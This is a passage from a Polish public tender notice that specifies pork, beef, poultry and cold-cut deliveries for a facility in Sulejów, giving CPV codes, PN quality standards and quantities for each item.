PN-A-82007	Mięso wieprzowe i wołowe drobno rozdrobnione, podgardle wieprzowe, bez dodatków modyfikujących. Produkowana zgodnie z procedurą metodą tradycyjną oraz PN. Niedopuszczalny smak i zapach świadczący  o nieświeżości lub inny obcy.
Zamawiający nie dopuszcza wędlin pakowanych próżniowo i mrożonych.	kg	200
19.	Sopel z indyka
	15131135-0
PN-A-86526	Filet z indyka wędzony i parzony. Rozdrobnienie: całe elementy. Powierzchnia nieuszkodzona, bez zanieczyszczeń i pleśni. Produkowany zgodnie z procedurą metoda tradycyjną i PN. Niedopuszczalny smak i zapach świadczący  o nieświeżości lub inny obcy. Zamawiający nie dopuszcza wędlin pakowanych próżniowo i mrożonych.	kg	150
20.   	Pasztet wieprzowy
	15131000-5
PN-A-82012	Mięso podrobowe, podroby, tłuszcz, poddany procesowi pieczenia. Bloki  o zróżnicowanej wielkości i masie w zależności od użytej formy. Powierzchnia gładka. 
Konsystencja smarowna do dość ścisłej, jednolita. Składniki równomiernie wymieszane. Barwa  powierzchni wyrobów nie krwistych różowa lub beżowa do brązowej, wyrobów krwistych: brunatna do ciemnobrunatnej. Smak i zapach charakterystyczny dla użytych surowców, przypraw i zastosowanym procesem technologicznym z nieznacznym wyczuciem goryczki wątroby, wyraźnie wyczuwalne przyprawy. Zawartość chlorku sodu( soli) nie więcej niż 2,5 %.  Produkowany zgodnie z procedurą  metoda tradycyjna oraz PN.
Niedopuszczalne : niejednolitość barwy wyrobów nie krwistych, a wyrobów krwistych jasnoczerwone plamy świadczące o niedopieczeniu. Niedopuszczalne są przypalenia.  Niedopuszczalne są skupiska poszczególnych składników. Niedopuszczalne: smak i zapach nieświeżych surowców oraz kwaśny i jełki, gorzki, pleśniowy lub inny obcy. Zamawiający nie dopuszcza pasztetu pakowanego próżniowo i  mrożonego.	kg	100
21.	Polędwica parzona
	15131130-5
PN-A-82007	Mięso wieprzowe schabowe wędzone i parzone. Rozdrobnienie: całe elementy. Barwa charakterystyczna dla asortymentu. Powierzchnia nieuszkodzona, bez zanieczyszczeń i śladów pleśni. Produkowana zgodnie z procedurą  metoda tradycyjną oraz PN. Niedopuszczalny smak i zapach świadczący  o nieświeżości lub inny obcy.
Zamawiający nie dopuszcza wędlin pakowanych próżniowo i mrożonych.	kg	200
22.	Schab pieczony
	15131130-5
PN-A-82007	Mięsień wieprzowy poddany obróbce cieplnej z przyprawami. Rozdrobnienie: całe elementy. Produkowany zgodnie z procedurą metodą tradycyjną oraz PN. Niedopuszczalny smak i zapach świadczący  o nieświeżości lub inny obcy.  Zamawiający nie dopuszcza wędlin pakowanych próżniowo i mrożonych.	kg	150
23.	Blok łopatkowy
	15131130-5
PN-A-82007
	Mięso wieprzowe z łopatki, przyprawy. Produkowany zgodnie z procedurą  metoda tradycyjną oraz PN. Niedopuszczalny smak i zapach świadczący  o nieświeżości lub inny obcy. Zamawiający nie dopuszcza wędlin pakowanych próżniowo i mrożonych	kg	150
24.	Pieczeń 
	15131130-5
PN-A-82012	Wyrób bez osłonki z mięsa wieprzowo-wołowego ze zmielonej masy o zróżnicowanym kształcie i masie w zależności od użytej formy. Powierzchnia  boczna i spodnia gładka, wierzch w miarę gładki, wyrównany, wypukły. Mogą być widoczne elementy dekoracyjne: paski słoniny, przyprawy, warzywa. Niedopuszczalne: zniekształcenia  batonów( połamanie, zgniecenie, pokruszenie), zabrudzenia, oślizgłość, zapleśnienie i przypalenie.
Konsystencja dość ścisła, związanie dobre, plastry o grubości 5 mm nie powinny rozpadać się. Struktura jednolita, wszystkie składniki równomiernie wymieszane. Niedopuszczalne: skupiska poszczególnych składników, części niejadalnych: ścięgien, powięzi, odłamków kości oraz liczne otwory wypełnione galaretą lub tłuszczem ze zmienioną barwą wokół otworów. Barwa powierzchni wyrobów nie krwistych złocista do brunatnej, wyrobów krwistych : brunatna do ciemnobrunatnej. Niedopuszczalna barwa czarna świadcząca o przypaleniu. Niedopuszczalne: niejednolitość barwy świadcząca o niewłaściwym procesie technologicznym, dla wyrobów krwistych jasnoczerwone plamy świadczące o niedopieczeniu. Smak i zapach charakterystyczny dla użytych surowców, dodatków i przypraw i zastosowanych procesów techno. Wyraźnie wyczuwalne przyprawy. Niedopuszczalny smak kwaśny, jełki, gorzki, pleśniowy lub inny obcy. Zawartość chlorku sodu ( soli) nie więcej niż 2,5 %.  Produkowana metodą tradycyjną  zgodnie z PN. Zamawiający nie dopuszcza pieczeni pakowanych próżniowo i mrożonych.	kg	100
25.	Antrykot
	15111100-0
PN 91/A-82004	Mięso pochodzące z podziału półtuszy wołowej na części zasadnicze .Mięso czyste o konsystencji jędrnej, o zapachu swoistym charakterystycznym dla świeżego mięsa, pozbawione całkowicie skrzepów krwi oraz strzępów tkanki mięsnej. Zamawiający nie dopuszcza mięsa mrożonego.	kg	1500
26.	Karkówka 
z/k
	15113000-3
PN 91/A-82002	Element wieprzowy zawierający kości w kształcie nieforemnego walca, znajduje się w przedniej części półtuszy, tkanka mięśniowa przerośnięta tłuszczem. Zamawiający nie dopuszcza mięsa mrożonego.	kg	1000
27.	Łopatka 
z/k
	15113000-3
PN 91/A-82002	Element wieprzowy zawierający kości. Zamawiający nie dopuszcza mięsa mrożonego.	kg	1000
28.	Schab z/k
	15113000-3
PN 91/A-82002	Element wieprzowy zawierający kości, zawierający najdłuższy mięsień grzbietu pozbawiony tkanki tłuszczowej, tkanka mięśniowa gruba, soczysta, delikatna.
Zamawiający nie dopuszcza mięsa mrożonego.	kg	1500
29.	Wołowina b/k
	15111100-0
PN 91/A-82004	Wyselekcjonowane części udźca, bez ścięgien i tkanki tłuszczowej. Zamawiający nie dopuszcza mięsa mrożonego.	kg	1000
30.	Golonka 
 z/k
	15113000-3
PN 91/A-82002	Mięso czyste, o barwie od bladoróżowej do jasnoczerwonej, konsystencji jędrnej, półelastycznej o zapachu swoistym charakterystycznym dla świeżego mięsa, pozbawione całkowicie skrzepów krwi oraz strzępów tkanki mięsnej. Tłuszcz jędrny, miękki, odkształcający się barwy białej lub kremowej, bez zanieczyszczeń, ciał obcych i śladów pleśni. Waga 400-600g
Zamawiający nie dopuszcza mięsa mrożonego.	kg	400
31.	Golonka 
b/k
	15113000-3
PN 91/A-82002	Mięso czyste, o barwie od bladoróżowej do jasnoczerwonej, konsystencji jędrnej, półelastycznej o zapachu swoistym charakterystycznym dla świeżego mięsa, pozbawione całkowicie skrzepów krwi oraz strzępów tkanki mięsnej. Tłuszcz jędrny, miękki, odkształcający się barwy białej lub kremowej, bez zanieczyszczeń, ciał obcych i śladów pleśni. Zamawiający nie dopuszcza mięsa mrożonego.	kg	300
32.	Żeberka 
wieprzowe 
	15113000-3
PN 91/A-82002	Kości żebrowe obrośnięte warstwą tkanki mięśniowej, słonina i skóra całkowicie zdjęta. Powierzchnia czysta, gładka, bez opiłków kości, przekrwień, ponacinań. Zamawiający nie dopuszcza mięsa mrożonego.	kg	300
33.	Flaki
	15100000-9
PN-88/A-82003	Żołądki wołowe, oczyszczone, krojone,
poddane wstępnej obróbce termicznej .Produkt oczyszczony, gotowany cięty- ok. 50 mm, długość śr.10 mm. Opakowanie jednostkowe- folia do opakowania próżniowego do 2,50 kg 	kg	200
34.	Kaszanka
	15131134-3
PN-A-82007	Kaszanka produkt z surowców podrobowych wieprzowych, z domieszką krwi w osłonkach naturalnych wieprzowych O 28-30, długość do 20 cm, produkt parzony.
Niedopuszczalne skupiska niewymieszanych składników.
Niedopuszczalny smak i zapach nieświeżych składników, pleśniowych, kwaśny , gorzki lub obcy.
Zamawiający nie dopuszcza kaszanki mrożonej.	kg	200
35.	Smalec

	15412100-0	Produkt powstały z wytopienia słoniny, bez dodatku łoju, przeznaczony do smażenia lub pieczenia . Struktura i konsystencja w temp. 20 °C stała, lekko miękka, barwa biała z odcieniem kremowym, zapach swoisty dla smalcu wieprzowego. Opakowanie jednostkowe kostka o wadze 200-250g lub walec o wadze do 1,5 kg.  	kg	250
36.	Wątroba	15100000-9	Narządy klatki piersiowej otrzymywane po uboju i wykrwawieniu trzody chlewnej.
Podroby czyste, o barwie swoistej dla narządu, konsystencji jędrnej, półplastycznej, zapachu swoistym, charakterystycznym dla narządu,  pozbawione całkowicie skrzepów krwi.
Oznakowanie - pieczęć IW na wątrobie, etykieta identyfikacyjna z pieczęcią IW oraz z datą przydatności do spożycia na pojemnikach.
Zamawiający nie dopuszcza wątroby mrożonej.
	kg	150
37	Słonina	15412100-0
PN - A- 86940 : 2001	Zewnętrzna okrywa półtuszy wieprzowej, tzw. płat słoniny bez skóry, o masie nie mniejszej niż 0,25 kg, jednego rodzaju. Struktura i konsystencja jędrna, miękka, odkształcająca się, barwa biała jednolita w całej masie, zapach swoisty dla słoniny surowej. Opakowanie pojemnik.	kg	50.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.13.11.30-5, 15.13.11.35-0, 15.13.10.00-5, 15.11.11.00-0, 15.11.30.00-3, 15.10.00.00-9, 15.13.11.34-3, 15.41.21.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 05.02.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Dostawy drobiu i jego przetworów dla OSSW w Kulach Oddział Zamiejscowy w Sulejowie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Uda całe z kurczaka świeże, klasa I	15112100-7	Element z kurczaka zawierający udo i podudzie wraz z mięśniami i skórą, świeży, niemrożony, waga porcji nie mniej niż 250 g; uda powinny być właściwie umięśnione, linie cięć równe, gładkie, mięso prawidłowo wykrwawione i ocieknięte, skóra bez przebarwień oraz resztek upierzenia, zapach swoisty dla mięsa drobiowego świeżego, 	kg	700
2	Filet z piersi kurczaka b/k świeży, klasa I	15112100-7	Mięso drobiowe, świeże, niemrożone, uzyskane z tuszek kurcząt, zawierające mięśnie piersiowe bez: skóry, kości klatki piersiowej, grzbietu i ścięgien; filety powinny być właściwie umięśnione, mięso prawidłowo wykrwawione i ocieknięte, zapach naturalny dla mięsa drobiowego świeżego; powierzchnia czysta, gładka, niezakrwawiona, niepostrzępiona, bez opiłków kości i tłuszczu	kg	600
3	Porcja rosołowa	15112100-7	Korpusy drobiowe wraz z szyjką, zapach naturalny dla mięsa drobiowego świeżego, niemrożonego	kg	700
4	Skrzydło indycze	15112120-3	Skrzydło indycze wraz ze skórą, mięso prawidłowo wykrwawione i ocieknięte, skóra bez przebarwień oraz resztek upierzenia, zapach naturalny dla mięsa drobiowego świeżego, niemrożonego	kg	700
5	Wątroba z kurczaka świeża, klasa I	15112300-9	Wątróbki drobiowe uzyskane z tuszek kurcząt, składające się z czterech płatów; wątróbki całe, pozbawione woreczka żółciowego, z odciętą żyłą główną, niezakrwawione, nieposzarpane, barwa jasnobrązowa, zapach charakterystyczny, dla wątróbek drobiowych świeżych; niemrożone	kg	400
6	Żołądki z indyka świeże, klasa I	15114000-0	Żołądki drobiowe uzyskane z tuszek indyczych, żołądki całe, właściwie umięśnione, przecięte, oczyszczone z błony wewnętrznej i treści żołądkowej, odcięte na wysokości wpustu i zwieracza żołądka, zapach charakterystyczny dla żołądków drobiowych świeżych, niemrożonych, barwa ciemnoróżowa do fioletowej	kg	100.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.11.21.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 05.02.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Dostawy wędlin, mięsa oraz podrobów dla OSSW  w Kulach Oddział Zamiejscowy w Sulejowie..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Baleron	15131130-5	Mięso wieprzowe- przyprawy. Kształt uzależniony od mięśnia, użytej osłonki, siatki formującej lub sposobu wiązania. Powierzchnia nieuszkodzona, czysta sucha dla wędzonek gotowanych lekko wilgotna. Struktura plastra o grubości 3 mm dość ścisła. Konsystencja soczysta , krucha, powierzchnia przekroju lekko wilgotna. Barwa charakterystyczna dla danego sortymentu, uzależniona od obróbki cieplnej lub jej braku. Smak i zapach charakterystyczny dla danego asortymentu. Zapach charakterystyczny dla procesu wędzenia. Produkowany zgodnie z recepturami odpowiednio do asortymentu metodą tradycyjną oraz zgodnie z PN. Niedopuszczalne są skupiska galarety na przekroju oraz wyciek soku. Niedopuszczalny jest smak i zapach świadczący o nieświeżości lub inny obcy. Zamawiający nie dopuszcza wędlin mrożonych.	kg	250
2	Blok szynkowy	15131130-5	Mięso wieprzowe z szynki wieprzowej. Smak charakterystyczny dla poszczególnych przypraw i surowców, powierzchnia bez zanieczyszczeń i śladów pleśni. Produkowany metodą tradycyjną bez konserwantów. Niedopuszczalny jest smak i zapach świadczący o nieświeżości lub inny obcy. Zamawiający nie dopuszcza wędlin mrożonych.	kg	120
3	Salami	15131130-5	Wędlina z mięsa wieprzowego i wołowego (nie mniej niż 70% mięsa wołowego), rozdrobnionego, w osłonce, średnica ok. 60 mm i dł. ok. 30 cm. Niedopuszczalny jest smak i zapach świadczący o nieświeżości lub inny obcy. Zamawiający nie dopuszcza wędlin mrożonych.	kg	120
4	Kiełbasa krakowska sucha	15131130-5	Produkt z mięsa wieprzowego i wołowego w osłonkach sztucznych, o średnicy ok. 50 mm i długości ok. 25 cm, wyrób parzony, wędzony i suszony do uzyskania pomarszczonej powierzchni. Niedopuszczalny jest smak i zapach świadczący o nieświeżości lub inny obcy.
Zamawiający nie dopuszcza wędlin mrożonych.	kg	250
5	Kiełbasa szynkowa	15131130-5	Mięso wieprzowe grubo rozdrobnione z szynki, przyprawy. Konsystencja zwięzła. Powierzchnia batonu brązowa, błyszcząca, bez zanieczyszczeń i śladów pleśni. Produkowana zgodnie z procedurą metodą tradycyjną oraz PN. Niedopuszczalny smak i zapach świadczący o nieświeżości lub inny obcy. Zamawiający nie dopuszcza wędlin mrożonych.	kg	250
6	Kiełbasa śląska	15131130-5	Mięso wieprzowe średnio rozdrobnione bez dodatków białka roślinnego, przyprawy. Konsystencja zwięzła. Powierzchnia bez zanieczyszczeń i śladów pleśni. Plaster o grubości 3mm nie powinien rozpadać się w temp 18 °C. Zapach charakterystyczny dla procesu wędzenia .Produkowana zgodnie z procedurą metodą tradycyjną oraz PN. Niedopuszczalny smak i zapach świadczący o nieświeżości lub inny obcy. Zamawiający nie dopuszcza wędlin mrożonych.	kg	500
7	Kabanosy	15131130-5	Produkt z mięsa wieprzowego i wołowego w osłonkach naturalnych, o długości ok. 25 cm, wędzony, parzony i suszony. Niedopuszczalny jest smak i zapach świadczący o nieświeżości lub inny obcy.
Zamawiający nie dopuszcza wędlin mrożonych.	kg	150
8	Szynka tyrolska	15131130-5	Produkt z mięśni szynki wieprzowej, drobno mielony, w osłonce nieprzepuszczalnej dla wody i powietrza, w formie bloku. Niedopuszczalny jest smak i zapach świadczący o nieświeżości lub inny obcy. Zamawiający nie dopuszcza wędlin mrożonych.	kg	200
9	Parówki	15131130-5	Mięso wieprzowo - wołowe drobno rozdrobnione, podgardle wieprzowe, bez dodatków modyfikujących. Konsystencja zwięzła. Powierzchnia nieuszkodzona, bez śladów pleśni. Produkowane zgodnie z recepturą metodą tradycyjną oraz PN. Niedopuszczalny smak i zapach świadczący o nieświeżości lub inny obcy. Zamawiający nie dopuszcza wędlin mrożonych.	kg	300
10	Rolada schabowa	15131130-5	Mięsień grzbietu wieprzowy poddany obróbce parzenia i wędzenia, formowany. Produkowany zgodnie z recepturą metodą tradycyjną oraz PN. Niedopuszczalny smak i zapach świadczący o nieświeżości lub inny obcy. Zamawiający nie dopuszcza wędlin mrożonych.	kg	150
11.	Szynka wiejska	15131130-5	Mięso z szynki wieprz. parzone, sznurowane. Rozdrobnienie: całe elementy. Konsystencja zwięzła. Powierzchnia nieuszkodzona, bez zanieczyszczeń i śladów pleśni, produkowana zgodnie z recepturą metodą tradycyjna i PN. Zamawiający nie dopuszcza wędlin mrożonych.	kg	120
12.	Boczek wędzony	15131130-5	Dolna część tłuszczowo - mięsna. Rozdrobnienie: całe elementy. Barwa charakterystyczna dla asortymentu. Powierzchnia nieuszkodzona, bez zanieczyszczeń i pleśni. Niedopuszczalny jest smak i zapach świadczący o nieświeżości lub inny obcy. Zamawiający nie dopuszcza boczku mrożonego.	kg	300
13.	Kiełbasa biała	15131130-5	Mięso wieprzowe średnio rozdrobnione, przyprawy. Struktura właściwa dla danego stopnia rozdrobnienia. Składniki równomiernie rozmieszczone, konsystencja zwięzła Plaster o grubości 3 mm nie powinien rozpadać się w temperaturze 18 C. Barwa charakterystyczna dla asortymentu w zależności od użytych surowców , dodatków i przypraw ; barwa mięsa- jasnoróżowa do ciemnoczerwonej, barwa tłuszczu - biała lub kremowa. Smak charakterystyczny dla poszczególnych przypraw i surowców. Produkowana zgodnie z procedurą metodą tradycyjną oraz PN. Niedopuszczalny smak i zapach świadczący o nieświeżości lub inny obcy. Zamawiający nie dopuszcza wędlin mrożonych.	kg	200
14.	Pasztet wieprzowy	15131310-1	Mięso wieprzowe, podroby, tłuszcz, poddany procesowi pieczenia. Bloki o zróżnicowanej wielkości i masie w zależności od użytej formy. Powierzchnia gładka. Konsystencja ścisła, jednolita. Składniki równomiernie wymieszane. Barwa powierzchni wyrobów nie krwistych różowa lub beżowa do brązowej; wyrobów krwistych: brunatna do ciemnobrunatnej. Smak i zapach charakterystyczny dla użytych surowców, przypraw i zastosowanym procesem technologicznym z nieznacznym wyczuciem goryczki wątroby, wyraźnie wyczuwalne przyprawy. Produkowany zgodnie z procedurą metoda tradycyjna oraz PN. Niedopuszczalne : niejednolitość barwy wyrobów nie krwistych, a wyrobów krwistych jasnoczerwone plamy świadczące o niedopieczeniu. Niedopuszczalne są przypalenia. Niedopuszczalne są skupiska poszczególnych składników. Niedopuszczalne: smak i zapach nieświeżych surowców. Zamawiający nie dopuszcza pasztetu mrożonego.	kg	60
15.	Kiszka pasztetowa	15131000-5	Wyrób w jelicie naturalnym wieprzowym, powierzchnia czysta, osłonka do farszu, dopuszcza się nieznaczne wycieki tłuszczu pod osłonką, o średnicy ok. 30 mm i długości ok. 15 cm, farsz z podrobów oraz surowców mięsnych wieprzowych rozdrobnionych do homogennej masy. Niedopuszczalny smak i zapach świadczący o nieświeżości lub inny obcy. Zamawiający nie dopuszcza wędlin mrożonych.	kg	60
16.	Salceson ozorkowy	15131000-5	Produkt z podrobów i ozora oraz surowców mieszanych wieprzowych, w osłonkach, o średnicy ok. 80 mm i długości ok. 30 cm, parzony. Niedopuszczalny smak i zapach świadczący o nieświeżości lub inny obcy. Zamawiający nie dopuszcza wędlin mrożonych.	kg	150
17.	Polędwica sopocka	15131130-5	Mięso wieprzowe schabowe wędzone i parzone. Rozdrobnienie: całe elementy. Barwa charakterystyczna dla asortymentu. Powierzchnia nieuszkodzona, bez zanieczyszczeń i śladów pleśni. Produkowana zgodnie z procedurą metoda tradycyjną oraz PN. Niedopuszczalny smak i zapach świadczący o nieświeżości lub inny obcy.
Zamawiający nie dopuszcza wędlin mrożonych.	kg	200
18.	Pieczeń	15131130-5	Wyrób bez osłonki z mięsa wieprzowo-wołowego ze zmielonej masy o zróżnicowanym kształcie i masie w zależności od użytej formy. Powierzchnia boczna i spodnia gładka, wierzch w miarę gładki, wyrównany, wypukły. Mogą być widoczne elementy dekoracyjne: paski słoniny, przyprawy, warzywa. Niedopuszczalne: zniekształcenia batonów( połamanie, zgniecenie, pokruszenie), zabrudzenia, oślizgłość, zapleśnienie i przypalenie. Konsystencja dość ścisła, plastry o grubości 5 mm nie powinny rozpadać się. Struktura jednolita, wszystkie składniki równomiernie wymieszane. Niedopuszczalne: skupiska poszczególnych składników, części niejadalnych: ścięgien, powięzi, odłamków kości oraz liczne otwory wypełnione galaretą lub tłuszczem ze zmienioną barwą wokół otworów. Barwa powierzchni wyrobów nie krwistych złocista do brunatnej; wyrobów krwistych : brunatna do ciemnobrunatnej. Niedopuszczalna barwa czarna świadcząca o przypaleniu. Niedopuszczalne: niejednolitość barwy świadcząca o niewłaściwym procesie technologicznym; dla wyrobów krwistych jasnoczerwone plamy świadczące o niedopieczeniu. Smak i zapach charakterystyczny dla użytych surowców, dodatków i przypraw zastosowanych procesów technologicznych. Wyraźnie wyczuwalne przyprawy. Niedopuszczalny smak kwaśny, zjełczały, gorzki, pleśniowy lub inny obcy. Produkowana metodą tradycyjną zgodnie z PN. Zamawiający nie dopuszcza pieczeni mrożonych.	kg	60
19.	Żebro wołowe	15111000-9	Mięso pochodzące z podziału półtuszy wołowej na części zasadnicze. Mięso czyste o konsystencji jędrnej, o zapachu swoistym charakterystycznym dla świeżego mięsa, pozbawione całkowicie skrzepów krwi oraz strzępów tkanki mięsnej. Zamawiający nie dopuszcza mięsa mrożonego.	kg	200
20.	Karkówka b/k	15113000-3	Element wieprzowy niezawierający kości w kształcie nieforemnego walca, znajduje się w przedniej części półtuszy, tkanka mięśniowa przerośnięta tłuszczem. Zamawiający nie dopuszcza mięsa mrożonego.	kg	600
21.	Łopatka b/k	15113000-3	Element wieprzowy niezawierający kości. Zamawiający nie dopuszcza mięsa mrożonego.	kg	500
22.	Schab b/k	15113000-3	Element wieprzowy niezawierający kości, zawierający najdłuższy mięsień grzbietu pozbawiony tkanki tłuszczowej, tkanka mięśniowa gruba, soczysta, delikatna. Zamawiający nie dopuszcza mięsa mrożonego.	kg	600
23.	Mięso wieprzowe drobne	15113000-3	Całe skrawki mięsa (kostka lub paski) bez tłuszczu zewnętrznego, bez ścięgien , kości i tkanki łącznej, niedopuszczalne mięso z głów, ogonów, nóg, żeberek, płatów słoniny, pachwiny i innych podrobów wieprzowych. Powierzchnia czysta, bez opiłków kości i przekrwień. Mięso świeże, nie mrożone.	kg	300
24.	Wołowina b/k	15111100-0	Wyselekcjonowane części udźca niezawierające kości, bez ścięgien i tkanki tłuszczowej. Zamawiający nie dopuszcza mięsa mrożonego.	kg	300
25.	Golonka z/k peklowana	15113000-3	Mięso czyste, o barwie od bladoróżowej do jasnoczerwonej, konsystencji jędrnej, półelastycznej o zapachu swoistym charakterystycznym dla świeżego mięsa, pozbawione całkowicie skrzepów krwi oraz strzępów tkanki mięsnej. Tłuszcz jędrny, miękki, odkształcający się barwy białej lub kremowej, bez zanieczyszczeń, ciał obcych i śladów pleśni. Waga 400-600g Zamawiający nie dopuszcza mięsa mrożonego.	kg	50
26.	Żeberka wieprzowe	15113000-3	Kości żebrowe obrośnięte warstwą tkanki mięśniowej, słonina i skóra całkowicie zdjęta. Powierzchnia czysta, gładka, bez przekrwień, ponacinań. Zamawiający nie dopuszcza mięsa mrożonego.	kg	200
27.	Flaki	15131600-1	Żołądki wołowe, oczyszczone, krojone, poddane wstępnej obróbce termicznej. Produkt oczyszczony, gotowany cięty- ok. 50 mm, długość śr.10 mm. Opakowanie jednostkowe- folia hermetycznie zamknięta do 2,50 kg. 	kg	150
28.	Kaszanka	15131134-3	Produkt z surowców podrobowych wieprzowych, z domieszką krwi w osłonkach naturalnych wieprzowych , przekrój 28-30, długość do 20 cm, produkt parzony. Niedopuszczalne skupiska niewymieszanych składników. Niedopuszczalny smak i zapach nieświeżych składników, pleśniowych, kwaśny , gorzki lub obcy. Zamawiający nie dopuszcza kaszanki mrożonej.	kg	100
29.	Wątroba	15114000-0	Narządy klatki piersiowej otrzymywane po uboju i wykrwawieniu trzody chlewnej. Podroby czyste, o barwie swoistej dla narządu, konsystencji jędrnej, półplastycznej, zapachu swoistym, charakterystycznym dla narządu, pozbawione całkowicie skrzepów krwi. Oznakowanie - pieczęć IW na wątrobie, etykieta identyfikacyjna z pieczęcią IW oraz z datą przydatności do spożycia na pojemnikach.
Zamawiający nie dopuszcza wątroby mrożonej.	kg	50
30.	Słonina	15412100-0	Zewnętrzna okrywa półtuszy wieprzowej, tzw. płat słoniny bez skóry, o masie nie mniejszej niż 0,25 kg, jednego rodzaju. Struktura i konsystencja jędrna, miękka, odkształcająca się, barwa biała jednolita w całej masie, zapach swoisty dla słoniny surowej. Niedopuszczalny nieświeży smak i zapach. Zamawiający nie dopuszcza słoniny mrożonej.	kg	100
31.	Smalec	15412100-0 	Tłuszcz zwierzęcy pakowany w kostkach. Zamawiający nie dopuszcza smalcu mrożonego.	kg	50
32.	Polędwica drobiowa prasowana	15131500-0	Produkt z mięsa drobiowego, uzyskanego z tuszek kurczaków, tłuszczów, surowców uzupełniających, przypraw i substancji dodatkowych dozwolonych; wygląd: blok w osłonkach sztucznych dł. ok. 35 cm i średnicy ok. 100 mm; na przekroju barwa jasnoróżowa do różowej, co najmniej 75 % częścią składników grubo rozdrobnionych, równomiernie rozłożonych i związanych z masą wiążącą; konsystencja ścisła, zwarta, plastry gr. ok. 3 mm nie powinny się rozpadać; smak i zapach charakterystyczny dla szynki z mięsa drobiowego z wyczuwalnymi przyprawami. Niedopuszczalny jest smak i zapach świadczący o nieświeżości lub inny obcy. Zamawiający nie dopuszcza wędlin mrożonych.	kg	200
33.	Szynka drobiowa	15131500-0	Produkt z mięsa drobiowego, uzyskanego z tuszek kurczaków, tłuszczów, surowców uzupełniających, przypraw i substancji dodatkowych dozwolonych; wygląd: okrągłe batony w osłonkach sztucznych dł. ok. 25 cm i średnicy ok. 80 mm; na przekroju barwa jasnoróżowa do różowej, co najmniej 75 % częścią składników grubo rozdrobnionych, równomiernie rozłożonych i związanych z masą wiążącą; konsystencja ścisła, zwarta, plastry gr. ok. 3 mm nie powinny się rozpadać; smak i zapach charakterystyczny dla szynki z mięsa drobiowego z wyczuwalnymi przyprawami i posmakiem wędzenia. Niedopuszczalny jest smak i zapach świadczący o nieświeżości lub inny obcy. Zamawiający nie dopuszcza wędlin mrożonych.	kg	200
34.	Schabik drobiowy	15131500-0	Produkt z mięsa drobiowego, uzyskanego z tuszek kurczaków, tłuszczów, surowców uzupełniających, przypraw i substancji dodatkowych dozwolonych; wygląd: batony w osłonkach sztucznych dł. ok. 25 cm i średnicy ok. 70 mm; na przekroju barwa jasnoróżowa, składniki drobno rozdrobnione, równomiernie rozłożone i związane z masą wiążącą; konsystencja ścisła, zwarta, plastry gr. ok. 3 mm nie powinny się rozpadać. Niedopuszczalny jest smak i zapach świadczący o nieświeżości lub inny obcy. Zamawiający nie dopuszcza wędlin mrożonych.	kg	150
35.	Kiełbasa drobiowa podsuszana	15131500-0	Produkt z mięsa drobiowego rozdrobnionego w osłonkach sztucznych o średnicy ok. 60 mm i długości ok. 25 cm; produkt wędzony, parzony i suszony. Niedopuszczalny jest smak i zapach świadczący o nieświeżości lub inny obcy. Zamawiający nie dopuszcza wędlin mrożonych.	kg	50
36.	Parówki drobiowe	15131500-0	Mięso drobiowe, drobno rozdrobnione, parzone; barwa powierzchni lekko brązowa; bardzo delikatne w dotyku i smaku. Niedopuszczalny jest smak i zapach świadczący o nieświeżości lub inny obcy.
Zamawiający nie dopuszcza wędlin mrożonych.	kg	100
37.	Filet wędzony z indyka	15131500-0	Produkt z mięsa drobiowego, filet poddany peklowaniu, formowaniu, wędzeniu i parzeniu. Niedopuszczalny jest smak i zapach świadczący o nieświeżości lub inny obcy. Zamawiający nie dopuszcza wędlin mrożonych.	kg	50
38.	Polędwica drobiowa w galarecie	15131500-0	Wyrób grubo rozdrobniony z jasnego mięsa indyczego w otoczce galarety z warzywami konserwowymi: papryką, pieczarkami oraz zieloną pietruszką; blok w osłonce sztucznej bezbarwnej; produkt parzony. Niedopuszczalny jest smak i zapach świadczący o nieświeżości lub inny obcy. Zamawiający nie dopuszcza wędlin mrożonych.	kg	120
39.	Kurczak faszerowany	15131500-0	Kurczak pieczony bez kości z farszem z mielonego mięsa wieprzowego z dodatkiem wątróbki, pieczarek; w blokach o dł. ok 25 cm. Niedopuszczalny jest smak i zapach świadczący o nieświeżości lub inny obcy. Zamawiający nie dopuszcza wędlin mrożonych.	kg	150
40.	Mortadela drobiowa z warzywami	15131500-0	Produkt drobno rozdrobniony, parzony w batonach o długości do 30 cm, średnicy do 10cm, z dodatkiem warzyw krojonych w kostkę (marchewka, pieczarki, papryka, ogórek, kukurydza w kolbach). Niedopuszczalny jest smak i zapach świadczący o nieświeżości lub inny obcy. Zamawiający nie dopuszcza wędlin mrożonych.	kg	200
41.	Smaczek	15131500-0	Produkt wieprzowy drobno rozdrobniony, parzony, w otoczce galarety w formie bloku. Niedopuszczalny jest smak i zapach świadczący o nieświeżości lub obcy, np gorzki, kwaśny , pleśniowy. Zamawiający nie dopuszcza wędlin mrożonych.	kg	120
42.	Kiełbasa parówkowa	15131130-5	Mięso wieprzowe i wołowe drobno rozdrobnione, podgardle wieprzowe, bez dodatków modyfikujących. Produkowana zgodnie z procedurą metodą tradycyjną oraz PN. smak i zapach świadczący o nieświeżości lub inny obcy. Zamawiający nie dopuszcza wędlin mrożonych.	kg	300
43.	Karczek pieczony	15131130-5	Mięso z karczku wieprzowego. Powierzchnia nieuszkodzona, bez zanieczyszczeń i pleśni. Produkowany zgodnie z recepturą metoda tradycyjną oraz PN. Niedopuszczalny jest smak i zapach świadczący o nieświeżości lub obcy, np gorzki, kwaśny, pleśniowy. Zamawiający nie dopuszcza wędlin mrożonych.	kg	100
44.	Schab pieczony	15131130-5	Mięso wieprzowe. Powierzchnia nieuszkodzona, bez zanieczyszczeń i pleśni. Produkowany zgodnie z recepturą metoda tradycyjną oraz PN. Niedopuszczalny jest smak i zapach świadczący o nieświeżości lub obcy, np gorzki, kwaśny , pleśniowy. Zamawiający nie dopuszcza wędlin mrożonych.	kg	100.</p></li>
